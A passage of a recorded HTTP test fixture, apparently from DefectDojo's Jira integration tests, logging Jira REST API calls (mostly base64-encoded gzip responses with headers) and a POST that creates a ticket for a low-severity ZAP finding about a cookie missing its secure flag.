kCER+Sq65sMVM3cFBjcG3bZz1ew97eA/AAAA///sWW1r2zAQ/ismUGhH7dhOnJfB6MLWwT5slBU2 + 6DfFVhszv2HZ6UaX/77nJFl1nTgrZZR8CJSi5OS7s3T33HOXZxuI0jjqM6Bkewz0q6Ud6xj/hTqj + PhPb+2RgfEEJv5P9JsXFjxXPKKEtZq43RzsKPxAQ5Ey85lac4UZS+YyVl1TsGKSCag3q3E+enVN8 + ZBZCX3EmiyX37DcFmlUwGSS1wMVaiJxWnKDlzHjiWJeZoMgzcdaKRLJFgQr72j/ROEj6RI0o3emn + jLw3n9OChRW959fciuUHCwBCx6Wy5LrihaBaXXIFLFxt1olrQlfQ10A5e+KNcWiL6w+2N9IH2kZS + CQcNUqK7z0u6MoDbKcONZ2fW6dkf3HJS5W8BLdsc0evjiN64TxA0AqosVYnKKOkuEdjOVtds7Qr6 + mJdrmJe8E0lAd280HUFXMN/JYLqVD1nOwhXhs6qSok5TRiV88K96R2dIhDwvX1jviZhdAMyoaUAr + Fdyy8SjylrOxGyzxAtPp3PP9CdELswkW9mzjdMGLKIIN1PzBow+2bu7eG+wjpXs7bJUKDsiF3CaR + Ry2Hged7Y+65fORH80k4CoOpF86CKHLZ5Nbjs4vondRyMlqc+J/wp56zU5bpUmjb6ivh1MK+x4nY + vkNZ4BT1MolDOjK7YEzQieF5pFwVgz1j+fHKnjhFRv53W/fD97g7ADh8j7tDhEP3GNATqa5ZM+Q2 + RF7p6RflE6G26swVfN0AeLH9si7zgg9vgDjh6jHxaGgFqclksqPHb5pclxpxj1Dw+pd+hILX8PgI + Bb1QYAgGXLxTGfdA8269dqE3r1iC1Q5qBN41eNgMtgV9sznXzOa6AjPr6goMhePZOi7zTNEd3frX + +scX9fFZr4BmU2p4aJYaBV+AfK2fjYaN3vNByn5946JOSHHLthy0lNWiUn6s8+q/jXKVLqMTptCv + fs/lmKqZv9J0mYY/ZNH48dRZ/4m3+gF5OpvN5i8AAAD//wMAnG1KXsMbAAA= + headers: + ATL-TraceId: + - a7b529f6bb1b75f6 + Connection: + - keep-alive + Content-Type: + - application/json;charset=UTF-8 + Date: + - Mon, 01 Mar 2021 19:45:27 GMT + Expect-CT: + - report-uri="https://web-security-reports.services.atlassian.com/expect-ct-report/global-proxy", + enforce, max-age=86400 + Server: + - AtlassianProxy/1.15.8.1 + Strict-Transport-Security: + - max-age=315360000; includeSubDomains; preload + Transfer-Encoding: + - chunked + X-Content-Type-Options: + - nosniff + X-XSS-Protection: + - 1; mode=block + cache-control: + - no-cache, no-store, no-transform + content-encoding: + - gzip + micros-issuer: + - micros/edge-authenticator + timing-allow-origin: + - '*' + vary: + - Accept-Encoding + x-aaccountid: + - 5fa43d1b8405b10077912260 + x-arequestid: + - ffe16d27-1338-4a47-8a0c-1ad1fb1ba2f3 + x-envoy-upstream-service-time: + - '191' + status: + code: 200 + message: OK +- request: + body: null + headers: + Accept: + - application/json,*.*;q=0.9 + Accept-Encoding: + - gzip, deflate + Cache-Control: + - no-cache + Connection: + - keep-alive + Content-Type: + - application/json + User-Agent: + - python-requests/2.25.1 + method: GET + uri: https://defectdojo.atlassian.net/rest/api/2/issue/10617 + response: + body: + string: !!binary | + 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 + headers: + ATL-TraceId: + - d7b8260181bb1205 + Connection: + - keep-alive + Content-Type: + - application/json;charset=UTF-8 + Date: + - Mon, 01 Mar 2021 19:45:27 GMT + Expect-CT: + - report-uri="https://web-security-reports.services.atlassian.com/expect-ct-report/global-proxy", + enforce, max-age=86400 + Server: + - AtlassianProxy/1.15.8.1 + Strict-Transport-Security: + - max-age=315360000; includeSubDomains; preload + Transfer-Encoding: + - chunked + X-Content-Type-Options: + - nosniff + X-XSS-Protection: + - 1; mode=block + cache-control: + - no-cache, no-store, no-transform + content-encoding: + - gzip + micros-issuer: + - micros/edge-authenticator + timing-allow-origin: + - '*' + vary: + - Accept-Encoding + x-aaccountid: + - 5fa43d1b8405b10077912260 + x-arequestid: + - 94858309-d780-4abe-9907-f74ac704a71f + x-envoy-upstream-service-time: + - '175' + status: + code: 200 + message: OK +- request: + body: null + headers: + Accept: + - application/json,*.*;q=0.9 + Accept-Encoding: + - gzip, deflate + Cache-Control: + - no-cache + Connection: + - keep-alive + Content-Type: + - application/json + User-Agent: + - python-requests/2.25.1 + method: GET + uri: https://defectdojo.atlassian.net/rest/api/2/serverInfo + response: + body: + string: !!binary | + H4sIAAAAAAAAA0yPQUvEMBCF/0uuttlJNm23uYkeVGQV2j2JSNpOsJImpUmFZdn/boKL623em+/N + Y06kUx4PiyGSfIYwe7nZDKixD4P7clQFo7wflaUWA8nINy5+dDbCDIBRoJA3+9vX5uGlvW7369TF + ici3BGWQwXtGBpyNO05oQ3ucMR64M24dYqhbRzP8RohMgUJczHsVEsiBsxx4zsuWMckruRUUAG4g + wjHvcYm97Thd2W0OrOUgRSH5jnLG/th+erTaRVCURVFppjWi2NW1ViJpVKziZbHjUfCir8v6X0Ew + qeFpXBRJ72i1mvDsepXsEzGXiaD9ODTkfP4BAAD//wMAQOo2LFoBAAA= + headers: + ATL-TraceId: + - 0d8b8424a1696af1 + Connection: + - keep-alive + Content-Type: + - application/json;charset=UTF-8 + Date: + - Mon, 01 Mar 2021 19:45:28 GMT + Expect-CT: + - report-uri="https://web-security-reports.services.atlassian.com/expect-ct-report/global-proxy", + enforce, max-age=86400 + Server: + - AtlassianProxy/1.15.8.1 + Strict-Transport-Security: + - max-age=315360000; includeSubDomains; preload + Transfer-Encoding: + - chunked + X-Content-Type-Options: + - nosniff + X-XSS-Protection: + - 1; mode=block + cache-control: + - no-cache, no-store, no-transform + content-encoding: + - gzip + micros-issuer: + - micros/edge-authenticator + timing-allow-origin: + - '*' + vary: + - Accept-Encoding + x-aaccountid: + - 5fa43d1b8405b10077912260 + x-arequestid: + - bad42d1e-7bf0-4c36-a1b3-74da5cfe99d5 + x-envoy-upstream-service-time: + - '27' + status: + code: 200 + message: OK +- request: + body: null + headers: + Accept: + - application/json,*.*;q=0.9 + Accept-Encoding: + - gzip, deflate + Cache-Control: + - no-cache + Connection: + - keep-alive + Content-Type: + - application/json + User-Agent: + - python-requests/2.25.1 + method: GET + uri: https://defectdojo.atlassian.net/rest/api/2/field + response: + body: + string: !!binary | + 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 + wKGuu74AAAD//wMANYTZQH1HAAA= + headers: + ATL-TraceId: + - 31d8218088333d76 + Connection: + - keep-alive + Content-Type: + - application/json;charset=UTF-8 + Date: + - Mon, 01 Mar 2021 19:45:28 GMT + Expect-CT: + - report-uri="https://web-security-reports.services.atlassian.com/expect-ct-report/global-proxy", + enforce, max-age=86400 + Server: + - AtlassianProxy/1.15.8.1 + Strict-Transport-Security: + - max-age=315360000; includeSubDomains; preload + Transfer-Encoding: + - chunked + X-Content-Type-Options: + - nosniff + X-XSS-Protection: + - 1; mode=block + cache-control: + - no-cache, no-store, no-transform + content-encoding: + - gzip + micros-issuer: + - micros/edge-authenticator + timing-allow-origin: + - '*' + vary: + - Accept-Encoding + x-aaccountid: + - 5fa43d1b8405b10077912260 + x-arequestid: + - 6d276756-e1ba-4b0c-854b-0c30ab58a4b0 + x-envoy-upstream-service-time: + - '61' + status: + code: 200 + message: OK +- request: + body: null + headers: + Accept: + - application/json,*.*;q=0.9 + Accept-Encoding: + - gzip, deflate + Cache-Control: + - no-cache + Connection: + - keep-alive + Content-Type: + - application/json + User-Agent: + - python-requests/2.25.1 + method: GET + uri: https://defectdojo.atlassian.net/rest/api/2/issue/createmeta?projectKeys=NTEST&issuetypeNames=Task&expand=projects.issuetypes.fields + response: + body: + string: !!binary | + H4sIAAAAAAAAA+xWS0/jMBD+K1EOnCpCS8WiShVCy66EdoWQKFwQB5NMqKljBz/adBH/fT2JE7vQ + ZbPlsgd6qWcyj28envFzDFVJeBZP4lKKR0i1igf+OLl99gJUKQN6XQKKKGC55c21LtUkSTLIrUIm + HsU+0YwoRQnf56ATCUonpKTJKHFWk+GB/VkTFI22xALWlrqYfbuaWYqTAix5zanW1gA6JEuiibyW + zKJ6jsfH1fi4j38FqZHQ+m6MnJQ0m9aO9xrGOZLjgy/WzWhcjcY7G1b0F0xVQRjbU+7/HV/Do2p4 + 9DFfVevMHd7xdjiqDkcf81ZARk1hvbnDH729DMJuwS7aoV86C3XHjMKOQSIDlUpaaiq45Z5GdQIG + UUaVpjzVUUkhhUjk0UrIxT5qp4Lb/umDwqVgSWG1Jf4g2MPhsSNnFui0g+x7eEbUwlKGa0m4YkRD + drHxRZl7jadJTpiCgb9vOQWWYeu7g217ZYqCyDUeJTwZKsEKammsmkrnUBD8UvufxEpLyh/QwVpp + KJDjtF86cFeO096/VmIQz4k6g5wYpm8IM9ChEyVIgjnHstqq6vguLHYvZGGWOnCe6eGdIy/CzHYI + Q91eGO/s6GBMrCCrhT67cVvPtTbiSW3kBWuaiqIUHDiugbCoTuVNVYmUBDuH2npaFa8fVjkw6sv8 + 1TPbMgdyPesckyxDT4D+JBRiCfGW2mNkRGuSzguEtlNkgX4QWsD1oZ2Gok1oG9q9QkPMG/3VB/Tb + 6x+a8AjPAm4LMZTsibEbBW5t9BoErWwAsmV5gJedUAPOK/0DsLeNsNMQ+NgTxmnj3fzRjFuR6xWR + 9RykRcmonfS+pJ8vnm2+/tcXTz0z64nLKF/sODMD/derseH6a/HT0pBF9Yr0c3PDADFa4GxloKHn + qnm98JKSpguQJzY/0k4sdxdt1HtqLlZX5h4XyiXBb1O85CFbNRynWgO1bT/lxlbtyYBcT3vfYZzt + mN+cVjcgVcPeJcHLRjvMbmjTp/c7rSIn7LMbivaF3iykZjn9ZS3ZMjxwgH6RGQUyDKPTDpZPy+pW + j2ds9sZvAAAA//+8l81uwjAMx19l6p1kHeUyaeI0aQf2CGgKKEoyAUVNGezQd5+dL1rSTe1ScXUT + +5fG8d8emxsYnFpvbLPj8IBYtZVL94BeTA0ce8dXAVFlpeqbJve33xBWdzTE2doiEpZ5FQmGCM+q + VQ9dfG//VBEbm+aYmcP7QLVngmuKO7R3osAglZDgnegv1Ht34jdrxAhGpOBnpMGalnca2JjUYz4l + Y86nwbT1vgv6bmwedZ6MWkyDChnZ5VyVZw9ZJEMuJoOMUnRlbB51kTVr7HPbLzEN/Z6pAKVme9J1 + uTfD+gf0CHkxrIKxAxYhuzkzkw85fl+UJqLi/CDLI9Qh8qkq9izkjIMez1DfwxY7tEG0a7F7hUUP + 2B9kYZyK0HrK3p9Vecc23DaiA050I7rxKOK8tboZa/C87nuaTOXkkVpHVJ8EXG29HClJfSNlg53e + uvkBAAD//wMAc91BljkVAAA= + headers: + ATL-TraceId: + - 590ef0cdfcd66ae5 + Connection: + - keep-alive + Content-Type: + - application/json;charset=UTF-8 + Date: + - Mon, 01 Mar 2021 19:45:28 GMT + Expect-CT: + - report-uri="https://web-security-reports.services.atlassian.com/expect-ct-report/global-proxy", + enforce, max-age=86400 + Server: + - AtlassianProxy/1.15.8.1 + Strict-Transport-Security: + - max-age=315360000; includeSubDomains; preload + Transfer-Encoding: + - chunked + X-Content-Type-Options: + - nosniff + X-XSS-Protection: + - 1; mode=block + cache-control: + - no-cache, no-store, no-transform + content-encoding: + - gzip + micros-issuer: + - micros/edge-authenticator + timing-allow-origin: + - '*' + vary: + - Accept-Encoding + x-aaccountid: + - 5fa43d1b8405b10077912260 + x-arequestid: + - fe29f784-e5d5-4eca-a984-b106580b86c3 + x-envoy-upstream-service-time: + - '69' + status: + code: 200 + message: OK +- request: + body: '{"fields": {"project": {"key": "NTEST"}, "summary": "Zap2: Cookie Without + Secure Flag", "description": "\n\n\n\n\n\n*Title*: [Zap2: Cookie Without Secure + Flag|http://localhost:8080/finding/392]\n\n*Defect Dojo link:* http://localhost:8080/finding/392\n\n*Severity:* + Low \n\n*CWE:* Unknown\n\n\n\n*CVE:* Unknown\n\n\n*Product/Engagement/Test:* + [Security How-to|http://localhost:8080/product/2] / [weekly engagement|http://localhost:8080/engagement/3] + / [ZAP Scan|http://localhost:8080/test/114]\n\n*Branch/Tag:* None\n\n*BuildID:* + None\n\n*Commit hash:* None\n\n*Systems/Endpoints*: \n\n* https://mainsite.com:443\n* + https://mainsite.com\n* https://mainsite.com/dashboard\n\n*Description*:\nA + cookie has been set without the secure flag, which means that the cookie can + be accessed via unencrypted connections.\n\nReference: http://www.owasp.org/index.php/Testing_for_cookies_attributes_(OWASP-SM-002)\n\nURL: + https://mainsite.com/dashboard\nMethod: GET\nParameter: opvc\nEvidence: Set-Cookie: + opvc\n\nURL: https://mainsite.com/dashboard\nMethod: GET\nParameter: dmid\nEvidence: + Set-Cookie: dmid\n\nURL: https://mainsite.com\nMethod: GET\nParameter: sitevisitscookie\nEvidence: + Set-Cookie: sitevisitscookie\n\n\n*Mitigation*:\nWhenever a cookie contains + sensitive information or is a session token, then it should always be passed + using an encrypted channel. Ensure that the secure flag is set for cookies containing + such sensitive information.\n\n*Impact*:\nNo impact provided\n\n*Steps to reproduce*:\nNone\n\n*References*:\nCWE-614\nWASC-13\n\n\n*Defect + Dojo ID:* 392\n\n*Reporter:* [(admin) ()|mailto:]\n", "issuetype": {"name": + "Task"}, "priority": {"name": "Low"}}}' + headers: + Accept: + - application/json,*.*;q=0.9 + Accept-Encoding: + - gzip, deflate + Cache-Control: + - no-cache + Connection: + - keep-alive + Content-Length: + - '1673' + Content-Type: + - application/json + User-Agent: + - python-requests/2.25.1 + method: POST + uri: https://defectdojo.atlassian.net/rest/api/2/issue + response: + body: + string: '{"id":"10618","key":"NTEST-466","self":"https://defectdojo.atlassian.net/rest/api/2/issue/10618"}' + headers: + ATL-TraceId: + - 7ff81201c7215549 + Connection: + - keep-alive + Content-Type: + - application/json;charset=UTF-8 + Date: + - Mon, 01 Mar 2021 19:45:29 GMT + Expect-CT: + - report-uri="https://web-security-reports.services.atlassian.com/expect-ct-report/global-proxy", + enforce, max-age=86400 + Server: + - AtlassianProxy/1.15.8.1 + Strict-Transport-Security: + - max-age=315360000; includeSubDomains; preload + Transfer-Encoding: + - chunked + X-Content-Type-Options: + - nosniff + X-XSS-Protection: + - 1; mode=block + cache-control: + - no-cache, no-store, no-transform + micros-issuer: + - micros/edge-authenticator + timing-allow-origin: + - '*' + x-aaccountid: + - 5fa43d1b8405b10077912260 + x-arequestid: + - a14d9cb7-3140-422e-9f97-68ff5a6a71cf + x-envoy-upstream-service-time: + - '521' + status: + code: 201 + message: Created +- request: + body: null + headers: + Accept: + - application/json,*.*;q=0.9 + Accept-Encoding: + - gzip, deflate + Cache-Control: + - no-cache + Connection: + - keep-alive + Content-Type: + - application/json + User-Agent: + - python-requests/2.25.1 + method: GET + uri: https://defectdojo.atlassian.net/rest/api/2/issue/NTEST-466 + response: + body: + string: !!binary | + H4sIAAAAAAAAA6RWbW/bNhD+K4Q+DFtmWy/2UldAMaSJ22VL08B2GqBJYdDSWWYtkQJJWfba/vcd + SSlOkzprU+dDxCPv/bmH/OTBpqQ89WJPAk9BQvqKQZ6qDqcFqI5KllDQjihBUs0EVx1ImS5A006y + pDyDXGSdNUiFe5COoZSggGt31ut4zFgOg8NwiAsF+QKXS61LFft+CgtIdCo+ih7VOVWKUd7joH20 + oX1aMj/ymVIV+K2BFWxR/3w6mky7g8NDlCxssF78yVPotFIJ1ZAJuXXBpbhChSiIwm7Q7wbhNAri + wR9x9LwXDA5/D8IgMDEaH3pbgjXzxBiNPsYZBNEua7dIQSWSlaYiKD0iqqB53iEpU5rxRJOSQQJE + LEgt5KpntBPBL2X+PVEoSCoJ/ppBTddUU/mnYv/CiwKbVBW/ONFp+iIM+uGwWU4x0Be7lDueaTT6 + mlK1Mj2q5tp8xQuaK+h4rQ0vtka+dDzNEBglNtmLeYWZeKUUHzG8J1av0ba1s91oa2cWdxq+i/SS + M63RgMFXo22S+seeVWKhaypNYooVZc4QIem9bLC4FjKD4WYw/J5wmzI3zppKl8wUFn936zwInqHn + aLCJBk82bFtoUfKLav4/4is83ISHP+dr0zprPh7x1o82/ejnvDXgVO3HXm9fvpj53rxz7IIdu/6A + HcwyCRnO9QMYIqZEXrkxc5KkUloUliJm6CF6tm9j+NCGow4nNYNp6c+Lu2HDFwbBkiXO3acHMoMv + DF8tRZWnJ0yVOd02KEQxFkq/w5k1yGxcUI1M64jsx2fIseQtL/rOmjQDYj+PRWXqZGO/MgLGMy/W + sjLBJBIwVzN1D3ly2HsWBi1P3q9asK+c4b6NaN9Gf8clTEimt08sRKvuD36MR1lBM1C+0VCtEYaC + 